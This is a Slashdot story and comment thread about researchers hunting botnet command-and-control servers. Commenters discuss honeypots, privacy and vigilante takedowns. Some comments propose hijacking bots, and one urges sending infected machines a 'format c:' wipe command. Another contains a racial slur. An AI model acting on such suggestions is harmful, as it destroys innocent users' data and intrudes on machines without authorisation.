Beta

Slashdot: News for Nerds

×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Hunting for Botnet Command and Controls

Zonk posted more than 9 years ago | from the owning-the-punkz dept.

Security 228

Uky writes "Convinced that the recent upswing in virus and Trojan attacks is directly linked to the creation of botnets for nefarious purposes, a group of high-profile security researchers is fighting back, vigilante-style. The objective of the group, which operates on closed, invite-only mailing lists, is to pinpoint and ultimately disable the C&C (command-and-control) infrastructure that sends instructions to millions of zombie drone machines hijacked by malicious hackers." From the article: "Using data from IP flows passing through routers and reverse-engineering tools to peek under the hood of new Trojans, Thompson said the researchers are able to figure out how the botnet owner sends instructions to the compromised machines."

cancel ×

228 comments

Botnet (3, Funny)

TimeTraveler1884 (832874) | more than 9 years ago | (#12858505)

Now only if they could do this with Skynet, we might just be able to postpone Judgement Day another 6 years.

Re:Botnet (1, Troll)

The Illegal Pirates (840709) | more than 9 years ago | (#12858933)

Dear Sir or Madam:

We, the Illegal Pirates of the Internet Who Must Steal Everything No Matter What, run a vast botnet using sophisticated command and control schemes that will remain impervious to your primitive nonsense. We have thousands of servers constantly swapping vast stores of copyrighted information, and nothing can stop us. Nothing! muahahahahahahahhaha

Signed,
The Illegal Pirates of the Internet Who Must Steal Everything No Matter What

p.s. No we're not using stupid comments on slashdot as encoded messages to our botnets

Own3d. (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#12858510)

One time, an OpenBSD box of mine got own3d by some script kiddie and, as the box was unattended for months, was admitted as a node in some script kiddie IRC network. After some playing around and modifying the ircd placed on my server to make me unkickable, I made myself a global operator and fucked with their whole network. Stupid script-niggers.

Re:Own3d. (0)

Anonymous Coward | more than 9 years ago | (#12858700)


Liar.

Uh oh! (1)

neonenergy (888041) | more than 9 years ago | (#12858515)

uh, time for me to disconnect to the internets for a while.

Easy way to catch them. (3, Insightful)

Elshar (232380) | more than 9 years ago | (#12858523)

Easiest way is to create a small IRC network, and submit the name to all the irc clients out there, so it'll be in the list. Also, name it something so it appears at the top or near the top...

To inflate user counts, just get an ircd that allows assigning yourself or others fake hostnames (for certain hosts/etc). Then load tons of bots in channels pretending to be 'users'. You could even get creative and make them idely chatter with each other..

Anyways, the point is that most of these botnet peoples eventually want to take a part of their net out to go mess with irc channels, and they usually seem to target smaller networks on the top of whatever list they're using.. So all ya gotta do if just log massive joins into certain channels, or when a flood of users magically connect to your fake network.. Then you have tons of bots to dissect or whatever.

Re:Easy way to catch them. (0)

Anonymous Coward | more than 9 years ago | (#12858551)

Ummm, what? Anybody else able to make any sense of Elshar's ramblings?

Re:Easy way to catch them. (2, Informative)

Nasarius (593729) | more than 9 years ago | (#12858613)

I think he's proposing that you run your own IRC network as a honeypot and hope that bot authors use it. Seems kinda inefficient.

Re:Easy way to catch them. (0)

Anonymous Coward | more than 9 years ago | (#12858661)

If you haven't figured it out yet, 90% of the posters on slashdot don't know what the hell they are talking about when it comes to technology.

Once upon a time slashdot was filled with very technically inclined people. Now it's just wanna-be's and has-beens. The magic is gone.

Re:Easy way to catch them. (1)

empaler (130732) | more than 9 years ago | (#12858680)

Um. Yes. Maybe?
I think he is (a) trying to be punny or (b) just doesn't get that it has nothing to do with the bots he's used to chatting with.

Re:Easy way to catch them. (2, Informative)

coekie (603995) | more than 9 years ago | (#12858688)

Finding them really is not the problem. Opers have nice tools/services for that (at least on some big networks), drone connection/channel detection notices scrolling by as fast as you can read...
It's the dissecting and cleaning part that's hard, and getting harder and harder as kiddies are getting "smarter".

Re:Easy way to catch them. (1)

WilliamSChips (793741) | more than 9 years ago | (#12858771)

You could even get creative and make them idely chatter with each other..
The results of that are disastrous. Go look up the thing that happened when two ALICEbots were hooked up to each other.

Re:Easy way to catch them. (2, Informative)

Keruo (771880) | more than 9 years ago | (#12858932)

Nice idea, but you're ~2 years late.
Modern spam zombies use p2p network to send messages back and forth, they aren't controlled from centralized irc servers anymore.

The article discusses decoding the control messages sent between the bots in their own network, and how to take control of them, and possibly shutting them down.

C&C attacks work well for military (1, Interesting)

puzzled (12525) | more than 9 years ago | (#12858526)


C&C attacks are the staple of today's military. An organized, centralized effort should do wonders for laying waste to the economic value (and motivation) behind such behavior.

Re:C&C attacks work well for military (5, Funny)

CrazyJim1 (809850) | more than 9 years ago | (#12858634)

C&C attacks are the staple of today's military. An organized, centralized effort should do wonders for laying waste to the economic value (and motivation) behind such behavior.

The best way to lay waste to someone's economic power in C&C is to destroy their harvesters. Make sure not to send infantry units because they'll suffer tiberium poisoning, or merely be run over by the harvester. Another great way to wreak havoc is to send the engineer into the harvesting facility as the harvester is unloading, you'll get the building, harvester and the tiberium thats being unloaded at the time. Of course, many believe engineering cheese is the cheap way to play C&C, but of course there are too many cheesy plays to count in that game. I suggest you play something like Starcraft. Or Starcraft2, which I have a chance of actually helping with.

Re:C&C attacks work well for military (1)

puzzled (12525) | more than 9 years ago | (#12858716)


I play Civilization II (yes, I am old, deal with it) and the computer players are easily fooled - don't place cities where the best resources are, place them on mountains with resources at their backs and the provoke, provoke, provoke - war costs nothing from a mountain top until armor is developed.

Nah, TA was better (0)

Anonymous Coward | more than 9 years ago | (#12858989)

In TA, in a skirmish game against computer controlled apponants, you build a basic airbase, send over as many lifters as you can build fast, and capture the enemy commander/s.
Then you have free range to build an inpenetrable base in peace before releasing them to inevitable defeat.

Bwahahahaha etc....

And then what? (0)

Anonymous Coward | more than 9 years ago | (#12858529)

How do they disable the C&C infrastructure?

Re:And then what? (1)

Ezdaloth (675945) | more than 9 years ago | (#12858555)

Let the military handle that. They have nice tanks that can blow any infrastructure you tell them to.

Re:And then what? (0)

Anonymous Coward | more than 9 years ago | (#12858590)

They have nice tanks that can blow any infrastructure you tell them to.

Oh that lucky, lucky infrastructure.

Re:And then what? (0)

Anonymous Coward | more than 9 years ago | (#12858556)

Send an allied spy into the enemy powerplant, or use V3 rockets to take out the power plant from extreme range, or use Yuri Prime to take over and sell the powerplant. IT'S NOT ROCKET SCIENCE PEOPLES!

Violation of My Privacy? (4, Interesting)

reporter (666905) | more than 9 years ago | (#12858532)

"Using data from IP flows passing through routers and reverse-engineering tools to peek under the hood of new Trojans, Thompson said the researchers are able to figure out how the botnet owner sends instructions to the compromised machines."

When the security "experts" are busy looking at all the data passing through routers, who is busy ensuring that the "experts" will not violate my privacy by reading the personal but sensitive e-mail notes that I send to my friends and associates?

In other words, when the "experts" are protecting me from the hackers, who is protecting me from the "experts"?

Re:Violation of My Privacy? (5, Insightful)

TCM (130219) | more than 9 years ago | (#12858543)

When the security "experts" are busy looking at all the data passing through routers, who is busy ensuring that the "experts" will not violate my privacy by reading the personal but sensitive e-mail notes that I send to my friends and associates?

You, by encrypting them.

Re:Violation of My Privacy? (0)

Seumas (6865) | more than 9 years ago | (#12858732)

Encryption is virtual admission of guilt.

Re:Violation of My Privacy? (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12858759)

Bullshit. It should be considered improper to the point of being anti-social to not use encryption. You wouldn't say that a firewall was an admission of guilt, or that having a lock on your front door was an admission of guilt.

Re:Violation of My Privacy? (0, Troll)

Seumas (6865) | more than 9 years ago | (#12858778)

What Amerika do you live in?!

Re:Violation of My Privacy? (1)

PyWiz (865118) | more than 9 years ago | (#12858936)

That's probably because a firewall and a lock are designed to keep intruders OUT not to keep your stuff IN away from people who might read it. Perhaps a better example is would you say sending your snail mail via a confidential courier in a sealed envelope is anti-social? No, but it's not an admission of guilt either.

Re:Violation of My Privacy? (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12858985)

What about locks on your car? Or if you want to use the snail mail comparison, consider that it is illegal to "sniff" your neighbor's snail mail. It isn't illegal to "sniff" their email, nor to listen to their cordless phone conversations. Would you say that legislation that protects our snail mail is an "admission of guilt?" Nope.

Re:Violation of My Privacy? (0, Troll)

Red Alastor (742410) | more than 9 years ago | (#12858972)

Encryption is virtual admission of guilt.>/i>

Decide, do you want to hide that information or you don't ? If you have nothing to hide, why does it bother you that someone could intercept your communication ?

Re:Violation of My Privacy? (1)

wokithub (723753) | more than 9 years ago | (#12859075)

what about stuff like credit card numbers, social security numbers and other personal info? isnt that worth encrypting? you may have nothing to "hide" but still not want any asshole out on the net nabbing anything he can about you

Re:Violation of My Privacy? (3, Informative)

wcdw (179126) | more than 9 years ago | (#12858578)

At every company/ISP there are people who have the ability, and regularly do, delve into the data streams flowing through the routers. And yes, sometimes they read your letter to Aunt Martha (or worse).

Mostly the volume of data involved is so large that trying to monitor it without filtering for the items of interest is usually impossible. And that filter is your best defense, in this particular situation.

Unless, of course, you're sending Aunt Martha that e-mail over IRC....

Re:Violation of My Privacy? (1)

puzzled (12525) | more than 9 years ago | (#12858857)

Long, long ago, at a now defunct provider, there was this long haired hacker type. This was back when everyone was on dialup in the mid nineties and ISPs still had hubs in their core. He dug a bit into the CuSeeMe protocols and made an 'observer'. There were people running a video stream on that ISP and chat via AOL with a second modem for purposes which I now blush to recall ... you can DL 10x worse these days, but it was quite a shock in 1995.

Re:Violation of My Privacy? (5, Insightful)

justforaday (560408) | more than 9 years ago | (#12858584)

Does it come as a surprise to you that people that have access to routers can sniff your packets?

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858693)

Does it come as a surprise to you that people that have access to routers can sniff your packets?

Of course they can but the question is : are they allowed to do it ? It's very easy to tap a phone call in any exchange but admitting you did it without the proper legal papers would get you in a whole lot of trouble, I guess.

Re:Look (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12858782)

Well you might have signed a contract that stipulated you wouldn't sniff in order to purchase your connection. But I don't think there are laws related to sniffing like there would be for telephones. More like using a radio to listen to your neighbor's cordless phone conversations, which is both legal and provides admissable info. No expectation of privacy there. So the better cordless phones do encryption. Cellphones have an expectation of privacy. But email is like old time CB.

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858901)

Wel luring the bots on your own net and analysing them there seems fine. So that would be more or less the same as receiving broadcasted things.

However they talk about a bunch of experts calling themselves the good guys and playing vigilante. (Which in itself is already a bit worrying)

Furter on they talk about actively sniffing routers. If an ISP admits it monitors traffic contents wouldn't it then lose its
rights as being a "carrier" ? Wouldn't that make them reasponsible for the content too, illegal content for example ?

Re:Look (1)

civilizedINTENSITY (45686) | more than 9 years ago | (#12859003)

I know my University monitors student use, including browsing and email. Whether that makes them responsible, I don't know. But don't get caught using P2P software (regardless of what you download) or you'll lose your connection. No servers of *any* kind, be they ftp, ssh, mail, or http. P2P is viewed as a type of server. So is bittorret.

Re:Look (1)

autocracy (192714) | more than 9 years ago | (#12858955)

Happens frequently. Line workers just tap right onto your loop... Central office folks can do the same.. or they can use the functions in the switch. They often do so...

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858994)

yes it happens, yes it's as easy as reading one 's mail if you're at the right place. It doesn't make it legal though and can get you in serious trouble if you admit doing it.

Yes. (1)

benjamindees (441808) | more than 9 years ago | (#12858987)

It should. There are wiretapping laws against this. It's no different than the phone company listening in on your conversations.

Re:Violation of My Privacy? (2, Insightful)

pete6677 (681676) | more than 9 years ago | (#12859040)

I'd say the grandparent poster is aware of this, but just wanted to take advantage of the opportunity to bitch about his privacy since it got him a guaranteed +5 Insightful on Slashdot.

Re:Violation of My Privacy? (1, Informative)

Anonymous Coward | more than 9 years ago | (#12858644)

As a provider, I can ask: Exactly what privacy do you expect beyond the TOS agreement you clicked/signed to gain access to my network?

The Wiretap Act "Provider Exception" 18 U.S.C 2511(2)(a)(i) [cybercrime.gov] enables the network, or those working for the network, to snoop on any traffic.

So, if you don't like that, you're free to make your own internet. As someone who operates networks, I can assure you, unless you're doing something that violates my TOS, I have better things to do with my time than read your crappy e-mail, and posts to /.

Re:Violation of My Privacy? (1)

Saeed al-Sahaf (665390) | more than 9 years ago | (#12858679)

I have better things to do with my time than read your crappy e-mail, and posts to /.

Obviously not.

Re:Violation of My Privacy? (4, Informative)

deep44 (891922) | more than 9 years ago | (#12858650)

When the security "experts" are busy looking at all the data passing through routers, who is busy ensuring that the "experts" will not violate my privacy by reading the personal but sensitive e-mail notes that I send to my friends and associates?
Umm.. they're not looking at "all the data passing through routers". Flow data is a sampling of information (source, dest, proto, port, etc) from a designated collection point. Even without the actual "data" portion of the packet, it's impractical to collect anything more than a small percentage of the total traffic.

So you can put the gun down- your privacy is safe.

Re:Violation of My Privacy? (1)

LiquidCoooled (634315) | more than 9 years ago | (#12858779)

I was imagining something like the Matrix.

Where trained hacks can look deep into the flowing code and decipher it visually.

Re:Violation of My Privacy? (2, Insightful)

Cross-Threaded (893172) | more than 9 years ago | (#12858664)

You bring up a reasonable concern.

However, when you click SEND from whatever email client you use, you are essentially flinging a postcard out of your 10th story window.

Said postcard contains:

_

*your sensitive information* | Address of your friend/associate

P.S. If you are not the intended recipient, please give me to someone else closer to the address.

_

If you are truly concerned about some "expert" taking the time to read whatever it is that you have to say to a friend, or associate, then you should investigate either encrypting your messages, or use a different medium of communication.

Re:Violation of My Privacy? (1, Insightful)

Anonymous Coward | more than 9 years ago | (#12858707)

>> When the security "experts" are busy looking at all the data passing through routers

>> In other words, when the "experts" are protecting me from the hackers, who is protecting me from the "experts"?

Wrong. Reverse engineering of malware does not involve sniffing traffic indiscriminately. By looking at the binary's assembly code the totality of the backdoor protocol can be determined. For those with less skills, examining the network traffic going from/to a single sacrificial "goat" machine running VMware at either the host level or the network level can also yield usable information.

Sniffing random traffic of unrelated machines is not a standard or even useful practice when conducting malware analysis.

Are you talking about cocks, balls, and vaginas? (1)

CyricZ (887944) | more than 9 years ago | (#12858742)

What sort of things are you discussing with your friends and associates? Are you talking about penises, scrotums and vaginas? Well, are you?

Seriously, you need to protect yourself. Don't depend on others to protect you while you're on the Internet. That's why you do certain things like not running Windows, run a solid, well-tested Linux or *BSD firewall, and practice encryption of all of your communication. The power of the Internet includes many responsibilities: one of those responsibilities is to ensure your own safety by taking the appropriate measures.

Re:Violation of My Privacy? (1)

Gerald (9696) | more than 9 years ago | (#12858755)

Don't worry. Your personal email isn't that interesting.

Re:Violation of My Privacy? (1, Funny)

Anonymous Coward | more than 9 years ago | (#12858788)

Your sig is ironic considering your post.

Re:Violation of My Privacy? (2, Funny)

MavEtJu (241979) | more than 9 years ago | (#12858799)

That should have been:

Don't worry. Your personal email wasn't that interesting.

Re:Violation of My Privacy? (3, Funny)

puzzled (12525) | more than 9 years ago | (#12858836)


I've owned a couple of ISPs and I currently do service for a regional provider. If I cared to look I could see everything - your best defense is the same reason that you don't get dates - what you do is just not that interesting to anyone else.

Re:Violation of My Privacy? (1)

timerider (14785) | more than 9 years ago | (#12858962)

if your email is so sensitive, and you value your privacy so much, why didn't you use gpg to encrypt it?

besides, it was all lies in it anyways.

pessimistic (4, Insightful)

moz25 (262020) | more than 9 years ago | (#12858537)

So is this news something to be pessimistic about or what? As I understand it, without vigilantes botnets would be even more "unstoppable" than they are now. It's cool that they're mitigating it, but it really comes down to getting some cooperation going on multiple levels... starting with the ISPs acting more against outgoing malicious traffic for a start.

Botnet commanders arent the problem (0)

Anonymous Coward | more than 9 years ago | (#12858541)

They will be here as long as there are vulnerable machines and zombies.

ps
Slow Down Cowboy!
Slashdot requires you to wait between each successful posting of a comment to allow everyone a fair chance at posting a comment.
It's been 7 minutes since you last successfully posted a comment
DA FUQ

Shutting down botnets is a pointless effort.. (4, Insightful)

Alascom (95042) | more than 9 years ago | (#12858549)

The problem isn't botnets, the problem is people and systems. The only reason botnets exist is due to the fact that current software is engineered without much thought toward security, and vendor supplied patches are not applied. Shutting down a botnet is at most only minimally worth the effort as the hosts are still vulnerable to be aquired by the next virus that comes around.

The only solution is secure software engineering and prompt, reliable patching.

Re:Shutting down botnets is a pointless effort.. (3, Insightful)

sweetooth (21075) | more than 9 years ago | (#12858616)

and until then we'll just let the botnets run rampant....

Unfortunately that's not a very good solution. While creating more secure software from the ground up is definately thew ay to go for the future you have to have some plan to deal with the current problems. Keep in mind that the vast majority of people aren't going to upgrade to the latest and greatest OS, web browser, or whatever if thier existing one works. So even after you've got more secure computing solutions out there you have to convince people it's worth the time and more specifically, cost, of upgrading.

Re:Shutting down botnets is a pointless effort.. (1)

daviq (888445) | more than 9 years ago | (#12858633)

like using macs...

Re:Shutting down botnets is a pointless effort.. (1)

Illserve (56215) | more than 9 years ago | (#12858757)

This approach is even less effective than that.

All they are doing is shutting down a rogue IRC channel. The boss merely has to switch to a new one. It probably takes about 5 seconds of effort.

But they have to do something.

Re:Shutting down botnets is a pointless effort.. (1)

rpozz (249652) | more than 9 years ago | (#12858816)

Yes, the less vulnerable systems there are, the harder it is to create a botnet, and the less effective the DoS attacks.

Personally, I'm in favour of some sort of simple built-in software DRM that by default only lets 'certified' executables run, and obviously can be turned off by people who know what they're doing.

Re:Shutting down botnets is a pointless effort.. (1)

Grakun (706100) | more than 9 years ago | (#12859048)

Personally, I'm in favour of some sort of simple built-in software DRM that by default only lets 'certified' executables run, and obviously can be turned off by people who know what they're doing.

The problem with that is that it is too restrictive and/or too annoying for your typical user to leave on. Even if they can't figure out how to disable it, they'll ask someone else. Or someone else will disable it while using their computer.

Personally, I'm in favor of holding people responsible for gross negligence. If you're going to purposely setup your computer so that it aids criminals, even when you know it's wrong, then you should be held responsible for aiding criminals. It irritates me when people say they don't care about the trojans and spyware on their machines, as long as they don't notice them. The problem is that the careless users aren't affected by the machines they infect, the servers they DoS, or the systems they hack. We need to start holding them responsible for their actions, so they can't just say "It doesn't hurt me any."

vigilantes? (0)

Anonymous Coward | more than 9 years ago | (#12858552)

How can this possibly fail?

Who cares really (-1, Flamebait)

Anonymous Coward | more than 9 years ago | (#12858561)

I'm a Windows owner. I download stuff all the time. I disabled my antivirus. Windows is still trying to install critical updates from 2004.

I ran adaware once and it came up with 400 some hits. But really, who cares. As long as I don't notice a slow down on my machine, I don't give a shit who owns it or what they do with it.

If they cause me trouble, then I might be arsed to take action (like adware. Spywhere is ok, adware, not so much).

But it doesn't hurt anyone else much either as I'm on a 56k line. Oh, scary DOS comming from that.

Re:Who cares really (2, Insightful)

moz25 (262020) | more than 9 years ago | (#12858623)

But it doesn't hurt anyone else much either as I'm on a 56k line. Oh, scary DOS comming from that.

What you're saying shows the root of the problem and why it's so hard to solve: you need some level of cooperation from people who do not have a direct interest in solving it simply because it doesn't affect them. Sure, your little 56k is quite harmless, but with 1000 zombies on little 56 lines, you can create quite a flood.

The other problem is with using up bandwidth allotments. Let's say the attacker is using 2KB/s for flooding. You won't notice that, but the other end wastes 5GB/month. Now if you have just 200 56k lines on pumping this on average, you'll be driving the target into unwanted bandwidth bills for sure. Now this analysis is making some assumptions, but you get the picture.

Re:Who cares really (2, Informative)

rpozz (249652) | more than 9 years ago | (#12858794)

This isn't flamebait, he's making a point.

Most 'normal' users really don't seem to give a damn if their computeris being hijacked, as long as they don't notice it. And the same users won't undertand that their 56k line is one of many, which adds up to an enormous amount of bandwidth.

Who cares? Nobody. (2, Interesting)

matts-reign (824586) | more than 9 years ago | (#12858968)

I know a user who I'm certain his system is totally 0wn3d. Its an unpatched windows 98 machine, no firewall, nothing. I put an EICAR string on his machine, and 6 months later, its still there. He calls them "Cheezy Viruses that don't hurt me" if they don't interfere with his day-to-day operations. Only when he got a dialer and built up $10,000 worth of phone bills one month did he care. The moral of the story: Users don't give a damn. I know a guy who happens to run a rather large botnet and he says 90% of his victims know there is a virus on their computers, they just can't be arsed to do anything about it.

kudos (1)

spamchang (302052) | more than 9 years ago | (#12858581)

it's great that industry, when faced with a lack of effort from the law and legislature, has the will and wherewithal to go after the scumbags. it's a great first step to show policymakers how much of a concern this is to internet security.

Re:kudos (2, Insightful)

Mysticalfruit (533341) | more than 9 years ago | (#12858961)

The main reason for this is that nobody in power has been afflicted by this.

The moment one of these BotNet's decides to DDOS the servers at the capitol building or start attacking other aspects of the US internet infrastructure, your congressman isn't going to give a shit.

The internet and the laws governing it are the wildwest at the moment. Some corners have very strong laws, other corners have none. However, if I remember it was the vigilantes who took care of the areas that strong law hadn't come into play.

Vigilante groups are a double edged sword. Laws generally aren't as agile as a group of people working for the common good. However, there is a danger that any group of people once given power is generally adverse to giving it up. Also the argument about what "common good" is gets nebulous. We all agree that child porn sites should be taken down and their proprieters chucked into wood chipppers. What happends when you get a vigilante group that feels that all porn sites are bad?

Told Ya So (2, Interesting)

Anonymous Coward | more than 9 years ago | (#12858597)

Internet ages ago, when DDOS was hot and researchers all concentrated on that threat, I tried to tell them that DDOS is nothing. Stuart and the others wrote their paper and based the threat on DDOS which influences computer security research even today. I predicted what is now called botnets would be the more frightening destination of the DDOS train. I didn't catch that IRC would be the covert channel of choice (not very covert). HTTPS seemed much more likely to me - net admins expect to see https traffic.
The vigilantes are running into the problem of cut-outs. The original botnets for DDOS all used a three-tier architecture - slaves (bots), masters (IRC servers), and clients. The current incarnation seems to have at least that many layers if not more. Killing the masters is better than trying to stomp on all the bots, but that still leaves the clients. Until the owners of the compromised boxen acting as masters allow access to track back to the clients, the vigilantes are facing the fate of Sisyphus.

Goetz - AC because I can't remember my /. user name

Self destruct the botnets? (5, Interesting)

dyftm (880762) | more than 9 years ago | (#12858614)

What would be really interesting is if using a combination of honeypot PCs (to match trojans to controllers) and the commands used to control the botnets, these vigilantes could make the zombified PCs download and run a cleaning tool to rid themselves of the trojan.

Re:Self destruct the botnets? (2, Informative)

Zocalo (252965) | more than 9 years ago | (#12858726)

If you are going down that road, then you would have to simply go ahead and do it, which makes you no different than the scum that put it there in the first place in the eyes of the law. Now, in theory, you could pop up a message that says "Your PC has been compromised... You need to do X, Y & Z." and be safe from the law. The snag is that most of the people whose PCs are members of botnets are probably the same ones who are used to seeing pop-ups of that form telling them to do and drop $30 on some shitty piece of software that just installs more malware.

Going after the controlling servers of the bot-net however, while it is definitely still a legal grey area, is less likely to get you a jail sentence and/or a fine. There are also viable approaches that wouldn't break the law at all, although they are probably not going to deliver results if the server is with certain "bullet proof hosting" providers who just don't care about abuse reports. In any case, it's still a game of Whack-a-Mole, only by going after the servers you are essentially playing with 10,000 mallets simultaneously...

Re:Self destruct the botnets? (0)

Anonymous Coward | more than 9 years ago | (#12858919)

Fuck it. Send a command to run format c:

If people can't clean their systems, they'll just have to loose all their email and digital pictures.

Re:Self destruct the botnets? (1)

Zocalo (252965) | more than 9 years ago | (#12859060)

If people can't clean their systems, they'll just have to loose all their email and digital pictures.

That thought has crossed my mind on several occasions when some bot on my local segment has been hammering my firewall and a quick NMAP reveals that, big surprise, NetBIOS and RPC are wide open. The price you pay for connecting via an ISP that doesn't treat their customers like idiots, even though some of them quite obviously are... So far, I've managed to resist the temptation, but boy, is it ever getting harder to do so!

Let's face it, mass mailing trojans have been mainstream news for sometime now, yet people *still* fall for them. And I don't mean emails that just require you to download them into a badly written email client, I mean the dumb kind where the recipient has to run the attachment sent to them by a total stranger themselves. Are they living under a rock, because even non-PC using members of my family have brought this issue up with me in conversation? Deleting all their email and digital pictures, and making it clear how and why it was done of course, may be the only way of giving them the whack up the back of the head with a clue by four they so desperately need.

Re:Self destruct the botnets? (3, Interesting)

coekie (603995) | more than 9 years ago | (#12858729)

Which is exactly what *does* happen a lot. This is a "hobby" of many "vigilantes"
Some drones have builtin uninstall commands, others have commands to download and execute programs, so cleaners are written.
But the drones are getting more and more advanced, builtin uninstall commands are getting more rare... it is clearly a battle that can not be won if only fought this way.

Re:Self destruct the botnets? (1)

mabhatter654 (561290) | more than 9 years ago | (#12858843)

the idea is to figure out where the masters come from or better yet, what the commands look like.... then program the router to drop those packets. That effectively cuts the masters off wherever they may be! This is grey-hat BOFH stuff at it's best!

Brilliant individuals (0)

Anonymous Coward | more than 9 years ago | (#12858635)

They aren't going to accomplish anything. It'll take forever to figure out where the HUGE botnets on IRC are located...

What causes botnets? (2, Interesting)

Anonymous Coward | more than 9 years ago | (#12858636)

Well, obviously script kiddies with the malice and idiocy to create them. But also, the end users ... the people who irresponsibly leave their machine open to the 'net, get 0wned, and then contribute to whatever DoS is going on.
These end users just *don't care*. Because, although their owned boxen are f-ing with the rest of the internet, it doesn't affect them - a selfish luser attitude, why should they bother virus/trojan scanning their boxen?
I wish ISPs would hold the lusers (criminally) responsible for this. I for one look after my home datacentre, including my Gentoo Linux boxen and keep them patched.

Re:What causes botnets? (0)

Anonymous Coward | more than 9 years ago | (#12858727)

Trying to get your customers thrown in jail is not a good business model. Ideally the government would deal with it, but this will never happen in the US where people think any kind of government intervention is the work of Satan (unless it involves invading a Middle Eastern country)

Re:What causes botnets? (1)

mabhatter654 (561290) | more than 9 years ago | (#12858859)

Seriously, without serious network software how could a normal user even prove they WEREN'T hacked... more than that, are there ANY tools that let networks REQUEST users to modify behavior... not the BOFH type "pull the plug" but responsible tools that monitor the connection quality and report back things that are suspecious so the user can fix them?

It'd be a great OSS project and a great firefox plugin!!

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12858965)

I wish ISPs would hold the lusers (criminally) responsible for this.

LOL:
1) think what that would mean for most ISP's because they would need to be accountable on their turn too.
2) they could try to pull the plug on that kind of users but they are a majority. So the isp won't bite the hand that feeds it.

Good for them. (4, Interesting)

deacon (40533) | more than 9 years ago | (#12858649)

From the FAS:

a group of high-profile security researchers is fighting back, vigilante-style.

This emotionally laden language has been deliberately chosen to make it sound like this activty is a "bad thing [tm]"

I truly believe it is the duty of every person to fight against clearly evil activity.

This includes a mugger hitting an old lady, a middle age man trying to drag a pre-teen girl (or boy) in to a car idiling in the street, and a person trying to kick in the door of the elderly couple down the street.

If the people disabling bot-nets make every effort to be certain they do not harm innocent or uninvolved people (and the standard here is very high), then they are doing a public service. (if they take the attitude, like some "anti-spam" people, of -> 'kill them all, let God sort them out, they are just assholes with very, very small peckers')

Those who believe the gub'mint is going to be johnny on the spot to fix all your boo-boos are sadly misguided: there is neither the manpower or the reaction time to fix everything "bad" in the world. That depends on YOU.

Re:Good for them. (1)

mikael (484) | more than 9 years ago | (#12858995)

Not forgetting "happy slapping".

Re:Look (1)

redzebra (238754) | more than 9 years ago | (#12859087)

Call yourself the good guy or the hero of the day and your allowed to do anything ? Think:

Clear evil activity is much harder to define. Even 2 of the 3 examples you gave are clearly broken. The mugger seemed evil to to me. The middle aged man could be the father of the girl. And the person kicking in the door could be yourself reacting on a call for help of the eldely couple.

The lack of control makes vigilante actions moslty contribute more to the problem than to the solution.

A more effective approach? (1)

Illserve (56215) | more than 9 years ago | (#12858670)

I'm wondering why they aren't telling bots to self-destruct? It seems pretty obvious to me that the C&C structures could reform fluidly as you take them down? A Black hat has a list of his bots, if you nuke his IRC channel, he just spawns a new one, or moves to a new IRC network...

But if instead you tell all his bots to wipe themselves out, he's got to buy new ones. Yes those machines will surely get reinfected within a few days/weeks, but it will throw a much bigger wrench in the works.

How is this not the obvious approach? Why aren't they doing it? Or maybe they are and aren't stupid enough to tell the media....

Re:A more effective approach? (2, Informative)

NevarMore (248971) | more than 9 years ago | (#12858886)

Wipe themselves out how? They probably don't have self-destruct routines,
1. Its more code weight, harder to transport, run, and create.
2. The bot virus writers have probably read the villiany HOWTO which advises against installing a self-destruct device because invariably the hero will use it as a very easy means to destroy the superweapon.

Re:A more effective approach? (1)

Illserve (56215) | more than 9 years ago | (#12858982)

If these bots have any kind of generalized means to execute commands on the local machine, there should be a way to force them to self destruct.

Bot flexibility is presumably valuable, giving their owners the ability to upgrade them in unforseen ways.

Re:A more effective approach? (0)

Anonymous Coward | more than 9 years ago | (#12859102)

Most of them have a "download this file from the internet and run it" command.
That, or a format C: would certainly do the trick :)

Vigilantism? Or good citizenship? (1, Interesting)

Anonymous Coward | more than 9 years ago | (#12858714)

The word "vigilante" keeps getting bandied about by people who frankly probably just sit on their backsides all day and do nothing to try and help the problem.

The botnets represent a serious threat in all sorts of different ways. Spamming. Phishing. DDOS attacks. Extortion. Money laundering. Child pornography. These large armies of zombie PCs can be use for a variety of evil purposes.

Yah.. this should be the remit of law enforcement agencies.. but guess what. Nothing much is happening. Law enforcement is either waaay outta their league or swamped with other issues. So as good citizens of the internet, what should we do?

Well.. those people who keep moaning about "vigilantes" will do nothing.. expect moan some more when their business is taken out by a DDOS-wielding extortionist. One basic obligation of all citizens it to protect others and to not ignore crimes when they are in progress. So, it is absolutely right and proper that people take direct action if it is clear that law enforcement agencies cannot.

You can target the botnet's C&C system. And there are a variety of ways you can do this - not all of which require immense technical skills. Sometimes that means you have to be slightly more "grey hat" than "white hat" in your approach.

But even if you are technically breaking the law to shut down a botnet.. exactly *who* are the victims? Nobody important, that's who - and they are usually hiding behind layer upon layer of false domain registrations, hijacked IP addresses and worse. In fact, most of the time there are no identifiable victims of this type of anti-botnet action at all - no valid names, companies or organisations. So who's gonna complain?

Personally, I'm not part of this group, but independently I have managed to shut down two large botnets.. at least temporarily. And I would do it again. But.. well, let's just say if you are involved in this sort of thing then it's better to stay an "Anonymous Coward".

I hope they invite the DShield guy (2, Interesting)

capedgirardeau (531367) | more than 9 years ago | (#12858718)

I can't find it on his site, but the guy who runs DShield was under a DDOS attack a few years ago and he managed to crack into the IRC channel the attacker used to control his bot network.

Apparently the attacker about crapped his drawers when instead of the usual bot replies to his commands an actual person started talking to him in his IRC channel.

http://dshield.org/ [dshield.org]

Re:I hope they invite the DShield guy (1)

n76lima (455808) | more than 9 years ago | (#12858906)

This sounds like Steve Gibson at Gibson Research.

http://www.grc.com/dos/grcdos.htm [grc.com]

This is the story about them being DDOS'ed and him cracking the IRC channel that was being used to run the bots.

The new superheroes...(whats their name?) (5, Funny)

droopycom (470921) | more than 9 years ago | (#12858723)

